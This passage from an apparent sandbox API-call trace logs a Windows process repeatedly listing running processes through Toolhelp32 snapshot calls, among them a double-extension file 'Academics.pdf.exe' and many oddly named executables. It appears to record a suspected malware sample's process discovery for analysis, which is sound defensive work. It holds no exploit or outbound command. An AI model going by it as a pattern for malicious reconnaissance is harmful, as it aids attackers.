th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0300.201] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0300.202] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0300.203] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0300.204] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0300.205] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0300.206] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0300.207] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0300.207] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0300.208] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="advised-cleaners-junction.exe")) returned 1 [0300.209] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="thy-transaction-css.exe")) returned 1 [0300.210] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x56c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="says_settlement.exe")) returned 1 [0300.211] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x774, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="katie.exe")) returned 1 [0300.212] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="choosing.exe")) returned 1 [0300.213] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="pmc.exe")) returned 1 [0300.213] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sansruled.exe")) returned 1 [0300.214] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x508, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="platform.exe")) returned 1 [0300.215] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x40c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="student.exe")) returned 1 [0300.216] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="deployment.exe")) returned 1 [0300.217] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="close.exe")) returned 1 [0300.218] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x684, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reviewerbedrooms.exe")) returned 1 [0300.218] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lb_indigenous_neighborhood.exe")) returned 1 [0300.219] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ghana-after.exe")) returned 1 [0300.220] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="perfect tries.exe")) returned 1 [0300.221] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="flexible.exe")) returned 1 [0300.222] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x738, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="secrets cas finding.exe")) returned 1 [0300.223] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x618, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="width cleared.exe")) returned 1 [0300.224] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0300.224] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x898, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0300.225] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0300.226] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x90c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0300.227] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Academics.pdf.exe")) returned 1 [0300.228] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0300.229] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 0 [0300.230] CloseHandle (hObject=0x294) returned 1 [0300.230] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0300.230] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0300.230] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0300.230] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0300.230] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d6e0 [0300.230] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0300.230] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d6e0 | out: hHeap=0x25c0000) returned 1 [0300.230] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0300.231] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0300.231] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa910 [0300.231] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0300.231] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0300.231] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0300.231] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0300.231] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x294 [0300.233] Process32FirstW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0300.234] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0300.235] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0300.236] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0300.237] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0300.237] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0300.238] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0300.239] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0300.240] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0300.241] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0300.242] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0300.242] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0300.243] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0300.244] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0300.245] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0300.246] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0300.247] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0300.248] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0300.248] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0300.249] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0300.250] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0300.251] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0300.252] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0300.252] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0300.254] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="advised-cleaners-junction.exe")) returned 1 [0300.255] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="thy-transaction-css.exe")) returned 1 [0300.255] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x56c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="says_settlement.exe")) returned 1 [0300.256] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x774, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="katie.exe")) returned 1 [0300.257] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="choosing.exe")) returned 1 [0300.258] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="pmc.exe")) returned 1 [0300.259] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sansruled.exe")) returned 1 [0300.259] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x508, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="platform.exe")) returned 1 [0300.260] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x40c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="student.exe")) returned 1 [0300.260] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="deployment.exe")) returned 1 [0300.261] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="close.exe")) returned 1 [0300.262] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x684, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reviewerbedrooms.exe")) returned 1 [0300.262] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lb_indigenous_neighborhood.exe")) returned 1 [0300.263] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ghana-after.exe")) returned 1 [0300.264] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="perfect tries.exe")) returned 1 [0300.264] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="flexible.exe")) returned 1 [0300.265] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x738, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="secrets cas finding.exe")) returned 1 [0300.266] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x618, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="width cleared.exe")) returned 1 [0300.266] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0300.267] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x898, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0300.267] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, 